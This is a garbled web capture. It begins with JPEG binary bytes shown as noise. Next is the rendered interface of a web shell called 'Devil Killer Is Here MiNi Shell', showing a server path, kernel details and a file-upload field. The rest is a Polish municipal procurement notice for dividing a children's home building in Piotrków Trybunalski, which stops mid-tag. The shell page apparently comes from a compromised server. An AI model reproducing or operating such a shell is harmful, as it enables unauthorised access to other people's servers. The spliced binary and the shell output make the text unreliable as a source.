JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220714/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220714/0025586201-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Podział istniejącego budynku Domu Dziecka na dwie części: budynek A i budynek B mieszczącego się przy ulicy Wysokiej 24/26 w Piotrkowie Trybunalskim. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Miasto Piotrków Trybunalski</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 590648468</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Pasaż Karola Rudowskiego 10</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Piotrków Trybunalski</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">97-300</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">łódzkie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL713 - Piotrkowski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia.publiczne@piotrkow.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.piotrkow.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Podział istniejącego budynku Domu Dziecka na dwie części: budynek A i budynek B mieszczącego się przy ulicy Wysokiej 24/26 w Piotrkowie Trybunalskim. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-28e2a7ca-0346-11ed-8000-d680d39e541a</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00255862</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-07-14</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00016777/04/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.7 Wykonanie remontu i adaptacji istniejącej części Domu Dziecka</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Projekt pn.: „Reorganizacja Systemu pieczy zastępczej w Piotrkowie Trybunalskim” współfinansowany ze środków Europejskiego Funduszu Społecznego w ramach Regionalnego Program Operacyjnego Województwa Łódzkiego na lata 2014-2020 Działanie IX.2 Usługi na rzecz osób zagrożonych ubóstwem lub wykluczeniem społecznym. </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/transakcja//639226 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1)	Komunikacja między zamawiającym a wykonawcą w postępowaniu o udzielenie zamówienia, w tym składanie ofert, wniosków o dopuszczenie do udziału w postępowaniu, wymiana informacji oraz przekazywanie dokumentów lub oświadczeń, z uwzględnieniem wyjątków określonych w ustawie Pzp, odbywa się w języku polskim przy użyciu środków komunikacji elektronicznej za pośrednictwem Platformy znajdującej się pod adresem: <br/>https://platformazakupowa.pl/transakcja//639226<br/>Korzystanie z Platformy przez wykonawcę jest bezpłatne.<br/>2)	Zamawiający dopuszcza korzystanie z komunikacji elektronicznej za pośrednictwem poczty elektronicznej zamowienia.publiczne@piotrkow.pl lub skrzynki podawczej ePUAP, <br/>z zastrzeżeniem sposobu i formy składania oferty.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wymagania techniczne i organizacyjne<br/>dot. korespondencji elektronicznej 1) Wymagania sprzętowo-aplikacyjne umożliwiające pracę na Platformie:<br/>a) stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s,<br/>b) komputer klasy PC lub MAC o konfiguracji: pamięć min. 2 GB Ram, procesor Intel IV 2 GHZ lub jego nowsza wersja, jeden z<br/>systemów operacyjnych – MS Windows 7, Mac Os x 10 4, Linux, lub ich nowsze wersje,<br/>c) zainstalowana dowolna przeglądarka internetowa, w przypadku Internet Explorer minimalnie wersja 10 0.,<br/>d) włączona obsługa JavaScript,<br/>e) zainstalowany program Adobe Acrobat Reader lub inny obsługujący format plików .pdf,<br/>f) Platforma działa według standardu w komunikacji sieciowej – kodowanie UTF8,<br/>g) oznaczenie czasu odbioru danych przez platformę zakupową stanowi datę oraz dokładny czas (hh:mm:ss) generowany wg czasu<br/>lokalnego serwera synchronizowanego z zegarem Głównego Urzędu Miar.<br/>2) Formaty dokumentów elektronicznych (plików):<br/>a) .doc, .docx, .rtf, .xls, .xlsx,.pdf, .jpg, .zip. – zamawiający rekomenduje stosowanie formatu .pdf. z uwagi na niskie ryzyko<br/>naruszenia integralności pliku oraz łatwiejszą weryfikację podpisu.<br/>b) formaty m.in. .rar .gif .bmp .numbers .pages, niewystępujące w Rozporządzeniu w sprawie Krajowych Ram Interoperacyjności<br/>(…), mogą być uznane przez zamawiającego za złożone nieskutecznie.<br/>c) do kompresji danych (zalecane) zamawiający rekomenduje formaty: .zip lub .7Z– zaleca się wcześniejsze podpisanie każdego<br/>pliku.<br/>3) Rozmiar jednego pliku przesyłanego przez:<br/>a) Platformę – formularz do złożenia, zmiany, wycofania oferty – max. 150 MB, pozostała komunikacja max. 500 MB.<br/>b) pocztę elektroniczną lub ePUAP max. 50 MB.<br/>5) Do podpisania plików wykonawca może użyć:<br/>a) kwalifikowanego podpisu elektronicznego, wystawionego przez dostawcę kwalifikowanej usługi zaufania, będącego podmiotem<br/>świadczącym usługi certyfikacyjne – dla dokumentów w formacie „pdf” zamawiający zaleca podpisywanie formatem PAdES,<br/>dokumenty w formacie innym niż „pdf” zaleca podpisywać formatem XAdES zewnętrzny.<br/>W przypadku użycia podpisu zewnętrznego plik z podpisem należy przekazać łącznie z podpisywanym dokumentem. W przeciwnym<br/>razie zamawiający uzna taki dokument za niepodpisany.<br/>b) podpisu zaufanego (inaczej Profil Zaufany)<br/>– wielkość pliku nie może przekraczać 10 MB po podpisaniu dokumentu, dostępny format podpisu „xml”. Plik można podpisać na<br/>stronie: https://moj.gov.pl/nforms/signer/upload?xFormsAppName=SIGNER<br/>c) zaawansowanego podpisu elektronicznego z dowodu osobistego<br/>– informacje na stronach: https://www.gov.pl/web/e-dowod/podpis-osobisty oraz https://www.gov.pl/web/e-dowod<br/>Zamawiający zaleca, aby w przypadku podpisywania pliku przez kilka osób, stosować podpisy tego samego rodzaju (podpisywanie<br/>różnymi rodzajami podpisów, np. osobistym i kwalifikowanym może doprowadzić do problemów w weryfikacji plików) oraz nie<br/>wprowadzać jakichkolwiek zmian w plikach po ich podpisaniu, co mogłoby skutkować naruszeniem integralności plików.<br/>6) Data wpływu (doręczenia) dokumentów elektronicznych:<br/>a) data wczytania do Platformy oferty / wniosku o dopuszczenie, dokumentów i oświadczeń składanych wraz z ofertą po użyciu<br/>przycisku „Złóż ofertę”,<br/>b) datę wczytania do Platformy oświadczeń, zawiadomień oraz informacji po użyciu przycisku „Wyślij wiadomość do<br/>zamawiającego”,<br/>c) data otrzymania potwierdzenia od zamawiającego doręczenia mu wiadomości wysłanej pocztą elektroniczną,<br/>d) data poświadczenia wysłania dokumentu na urzędową skrzynkę na ePUAP z systemu teleinformatycznego służącego do obsługi<br/>doręczeń.<br/>Osoby uprawnione do komunikowania się z wykonawcami:<br/>Ewa Tymińska, tel. 44 732 77 96;<br/>z zastrzeżeniem, że zamawiający, zgodnie z zasadą ustawy Pzp, nie udziela informacji, związanych z prowadzonym<br/>postępowaniem, telefonicznie ani w formie osobistego kontaktu w swojej siedzibie – komunikacja ustna może jedynie dotyczyć<br/>informacji nieistotnych, np. kwestii technicznych bądź porządkowych.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Zamawiający informuje, że Administratorem danych osobowych wykonawcy jest<br/>Prezydent Miasta, Pasaż Karola Rudowskiego 10, 97-300 Piotrków Trybunalski<br/>2. W sprawach związanych z przetwarzaniem danych osobowych, można kontaktować się z Inspektorem Ochrony Danych<br/>Osobowych – Włodzimierzem Laskiem w Urzędzie Miasta Piotrkowa Trybunalskiego, za pośrednictwem adresu e-mail:<br/>iod@piotrkow.pl, tel. 7327765<br/>3. Dane osobowe będą przetwarzane w celu przeprowadzenia postępowania o udzielenie zamówienia publicznego, archiwizacji a<br/>także celów wynikających z prawnie uzasadnionych interesów realizowanych przez administratora.<br/>4. Podstawę prawną przetwarzania danych osobowych stanowi ustawa Prawo zamówień publicznych, wydane na jej podstawie akty<br/>wykonawcze, a także ustawa o narodowym zasobie archiwalnym i archiwach.<br/>5. Dane osobowe będą ujawniane wykonawcom oraz wszystkim zainteresowanym z uwzględnieniem przepisów w zakresie<br/>zamówień publicznych, a także podmiotom przetwarzającym dane na podstawie zawartych umów.<br/>6. Pani/Pana dane osobowe mogą zostać powierzone następującym podmiotom:<br/>1) dostawcom systemów informatycznych, z którymi współpracuje Administrator, w celu utrzymania ciągłości oraz poprawności<br/>działania systemów;<br/>2) upoważnionym z mocy prawa podmiotom na udokumentowany wniosek.<br/>7. Dane osobowe wykonawcy będą przechowywane przez okres obowiązywania umowy a następnie 5 lat, albo 15 lat w przypadku<br/>zamówień współfinansowanych ze środków UE, począwszy od 1 stycznia roku kalendarzowego następującego po zakończeniu<br/>okresu obowiązywania umowy. Okresy te dotyczą również wykonawców, którzy złożyli oferty i nie zostały one uznane, jako<br/>najkorzystniejsze (nie zawarto z tymi wykonawcami umowy).<br/>8. Osobie, której dane dotyczą przysługuje prawo:<br/>1) dostępu do danych. W przypadku, gdy wykonanie obowiązku związanego z prawem dostępu do danych wymagałoby<br/>Niewspółmiernie dużego wysiłku, zamawiający może żądać od osoby, której dane dotyczą, wskazania dodatkowych informacji<br/>mających na celu sprecyzowanie żądania, w szczególności podania nazwy lub daty postępowania o udzielenie zamówienia<br/>publicznego lub konkursu;<br/>2) sprostowania danych, ich usunięcia oraz ograniczenia przetwarzania na warunkach określonych w przepisach Rozporządzenia<br/>Parlamentu i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem<br/>danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE. Żądanie sprostowania<br/>danych nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia ani zmianą postanowień umowy w sprawie<br/>zamówienia publicznego w zakresie niezgodnym z przepisami. Żądanie sprostowania danych nie może skutkować zmianą wyniku<br/>postępowania o udzielenie zamówienia<br/>ani zmianą postanowień umowy w sprawie zamówienia publicznego w zakresie niezgodnym z przepisami. Wystąpienie z żądaniem<br/>ograniczenia przetwarzania, nie ogranicza przetwarzania danych osobowych do czasu zakończenia postępowania o udzielenie<br/>zamówienia publicznego lub konkursu;<br/>3) wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych.<br/>9. Podanie danych jest dobrowolne, jednakże ich niepodanie może uniemożliwić zamawiającemu dokonanie oceny spełniania<br/>warunków udziału w postępowaniu oraz zdolności wykonawcy<br/>do należytego wykonania zamówienia, co skutkować może wykluczeniem wykonawcy z postępowania lub odrzuceniem jego oferty.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">SPZ.271.26.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Podział istniejącego budynku domu dziecka na dwie części: budynek A i budynek B.<br/>Istniejący budynek domu dziecka zostanie podzielony funkcjonalnie na dwie niezależne placówki. Podział nastąpi poprzez<br/>wykonanie niezbędnych zamurowań, wykonaniu ściany oddzielenia pożarowego, w budynku B wydzielona zostanie nowa<br/>przestrzeń klatki schodowej. Zaprojektowano dodatkowe wejście do przestrzeni piwnic znajdujących się pod budynkiem „B”.<br/>W obrębie obu klatek schodowych (budynek „A” i budynek „B”) zamontowane zostaną platformy schodowe krzywoliniowe,<br/>przystosowane dla obsługi komunikacyjnej osób niepełnosprawnych poruszających się na wózkach inwalidzkich.<br/>Instalacje wody i kanalizacji zostaną rozdzielone, zamontowane zostaną dwa odrębne wodomierze. Wymienione zostaną<br/>piony i poziomy, wymieniony zostanie biały montaż.<br/>W łazienkach część białego montaż i baterii przystosowana dla osób niepełnosprawnych poruszających się na wózkach<br/>inwalidzkich.<br/>Instalacja elektryczna wewnętrzna zostanie rozdzielona i wymieniona na nową wraz z osprzętem. Zostaną zamontowane<br/>wyłączniki p.poż odrębne dla obu budynków. Zostaną zamontowane podliczniki, tak aby możliwe było rozliczenie zużycia<br/>energii z istniejącego przyłącza do budynku.<br/>Lokalna kotłownia c.o. i c.w.u. pozostanie w budynku „A” (piwnice) i będzie obsługiwała oba wyodrębnione budynki. Blok<br/>kuchenny pozostaje w budynku „A”. Kuchnia w budynku „B” będzie funkcjonowała na zasadzie cateringu.<br/>Roboty muszą zostać wykonane w najwyższym standardzie, zapewniającymi spełnienie wymagań zgodnie z zasadami<br/>uniwersalnego projektowania.<br/>Roboty budowlane:<br/> roboty rozbiórkowe,<br/> zamurowania, wykonanie nowych nadproży,<br/> wykonanie konstrukcji żelbetowych (klatka schodowa),<br/> tynki i okładziny wewnętrzne,<br/> ścianki działowe,<br/> podłogi i posadzki,<br/> stolarka okienna i drzwiowa,<br/> ślusarka, poręcze, uchwyty dla niepełnosprawnych,<br/> platformy schodowe,<br/> roboty zewnętrzne.<br/>Roboty instalacyjne:<br/> wymiana instalacji wod. – Kan.,<br/> zmiana lokalizacji grzejników,<br/> dostawa i montaż urządzeń sanitarnych, w tym dla osób niepełnosprawnych,<br/> dostawa i montaż armatury czerpalnej, w tym dla osób niepełnosprawnych,<br/>Roboty elektryczne:<br/> roboty demontażowe starych instalacji,<br/> rozdział instalacji elektrycznych z dodatkowym opomiarowaniem zużycia energii elektrycznej do rozliczeń wewnętrznych,<br/> przeciwpożarowy wyłącznik prądu,<br/> wykonanie tablic energetycznych piętrowych wraz z zasilaniem,<br/> instalacja oświetlenia podstawowego,<br/> instalacja oświetlenia ewakuacyjnego – awaryjnego,<br/> instalacja gniazd wtyczkowych 230 V,<br/> gniazda wtyczkowe siłowe,<br/> ostrzegacze gazowe,<br/> instalacja domofonowa,<br/> instalacja telefoniczna,<br/> instalacja TV,<br/> ochrona przeciwporażeniowa i przepięciowa,<br/> instalacje suszarek do rąk, baterii dla niepełnosprawnych,<br/> instalacja wzywania pomocy,<br/> pętle indukcyjne.<br/>Wymagania:<br/>1) W dniu zgłoszenia gotowości do odbioru końcowego, wykonawca ma obowiązek przekazania zamawiającemu kompletu<br/>dokumentów odbiorowych wraz z pozwoleniem na użytkowanie lub przyjętym zawiadomieniem o zakończeniu robót zgodnie<br/>z wymaganiami przepisów Prawa Budowlanego bez uwag ani sprzeciwu.<br/>2) W okresie rękojmi i gwarancji, w ramach wynagrodzenia, wykonawca przejmuje na siebie wszelkie obowiązki wynikające<br/>z serwisowania i konserwacji zabudowanych urządzeń, instalacji i wyposażenia zamontowanego podczas robót.<br/>Wykonawca przez okres rękojmi dokonywał będzie, nie rzadziej niż dwa razy w roku, serwisowanie i konserwację instalacji,<br/>urządzeń i wyposażenia elektrycznego. Konserwacja dokonana będzie w terminie do 30 maja każdego roku obowiązującej<br/>rękojmi – I termin, oraz do 30 listopada każdego roku obowiązującej rękojmi – II termin i potwierdzona wpisem do książki<br/>serwisowej danego urządzenia. O fakcie dokonania konserwacji i serwisu wykonawca poinformuje zamawiającego pisemnie<br/>we wskazanych terminach. Do zgłoszenia potwierdzenia wykonawca dołączy kserokopię książki serwisowej danego<br/>urządzenia z odpowiednim wpisem potwierdzającym dokonanie serwisu i konserwacji. Po dokonaniu zgłoszenia<br/>Zamawiający w terminie 14 dni dokona sprawdzenia i odbioru wykonanych prac. Zamawiający uzna prace za wykonane<br/>należycie jeżeli w terminie 14 dni nie zgłosi na piśmie Wykonawcy zastrzeżeń i uwag. W przypadku ujawnienia wad,<br/>zamawiający wyznaczy termin na ich usunięcie.<br/>3) W przypadku, gdy wykonawca nie przystępuje do usuwania wad lub usunie wady w sposób nienależyty, zamawiający, poza uprawnieniami przysługującymi mu na podstawie Kodeksu Cywilnego, może powierzyć usunięcie wad podmiotowi<br/>trzeciemu na koszt i ryzyko wykonawcy (wykonanie zastępcze),po uprzednim wezwaniu wykonawcy i wyznaczeniu<br/>dodatkowego terminu nie krótszego niż 21 dni.<br/>4) Wykonawca na własny koszt dokona przeglądu gwarancyjnego końcowego z powiadomieniem odpowiednich instytucji, w<br/>tym zamawiającego a protokół dostarczy inwestorowi, na trzy tygodnie przed upływem terminu gwarancji. W przypadku<br/>wystąpienia, usterki zawarte w protokole należy naprawić w ciągu 14 dni od sporządzenia protokołu i ponownie wykonać<br/>przegląd. W protokole wykonawca poda sposób i nr rachunku na który ma zostać zwrócone zabezpieczenie gwarancyjne do<br/>umowy.<br/>5) Zamawiający dopuszcza stosowanie innego typu osprzętu i wyposażenia niż w dokumentacji pod warunkiem zachowania<br/>tych samych danych technicznych i standardów jakościowych elementów wskazanych dokumentacją.<br/>6) Zapewnienie pełnej obsługi geodezyjnej z inwentaryzacją powykonawczą włącznie, na koszt własny.<br/>7) Przeprowadzenie niezbędnych badań wynikających z przepisów i prawa budowlanego, w tym badań natężenia<br/>oświetlenia w pomieszczeniach budynku.<br/>8) Przeprowadzenie wizji stanu technicznego budynków znajdujących się w strefie oddziaływania robót. Wymagane jest<br/>wykonanie dokumentacji fotograficznej.<br/>9) Wykonawca będzie odpowiadać za wszelkie spowodowane przez jego działania uszkodzenia instalacji na powierzchni<br/>ziemi i urządzeń podziemnych wykazanych w dokumentach przekazanych mu przez zamawiającego.<br/>10) Rozpoczęcie prac należy zgłosić do odpowiednich jednostek – gestorów sieci, celem poinformowania o w/w robotach i<br/>czasie ich trwania.<br/>2. Zamawiający wymaga, aby łączny udział pojazdów elektrycznych lub pojazdów napędzanych gazem ziemnym we flocie<br/>pojazdów samochodowych w rozumieniu art. 2 pkt 33 ustawy z dnia 20 czerwca 1997 r. - Prawo o ruchu drogowym<br/>używanych przy wykonywaniu tego zadania wynosił co najmniej 10%, zgodnie z art. 68 ust. 3 z art. 36a ustawy z dnia 11<br/>stycznia 2018 r. o elektromobilności i paliwach alternatywnych.<br/>3. Nie dokonano podziału zamówienia na części z powodu:<br/>Realizacja zadania przez różnych wykonawców skutkowałoby powstaniem kolizji niemożliwych do wyeliminowania lub<br/>uniemożliwiających prawidłową realizację zadań. Roboty wykonywane są w tym samym czasie i są od siebie zależne, co<br/>zapewnia spójność realizacji. W przypadku podziału czas wykonania robót byłby nieracjonalnie wydłużony, co miałoby<br/>wpływ na zwiększenie kosztów inwestycji.<br/>4. Zamawiający nie zastrzega obowiązku osobistego wykonania przez wykonawcę kluczowych zadań.<br/>5. Szczegółowo przedmiot zamówienia opisany został w SWZ CZĘŚĆ II. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45215215-7 - Roboty budowlane w zakresie domów dziecka</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">6 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span 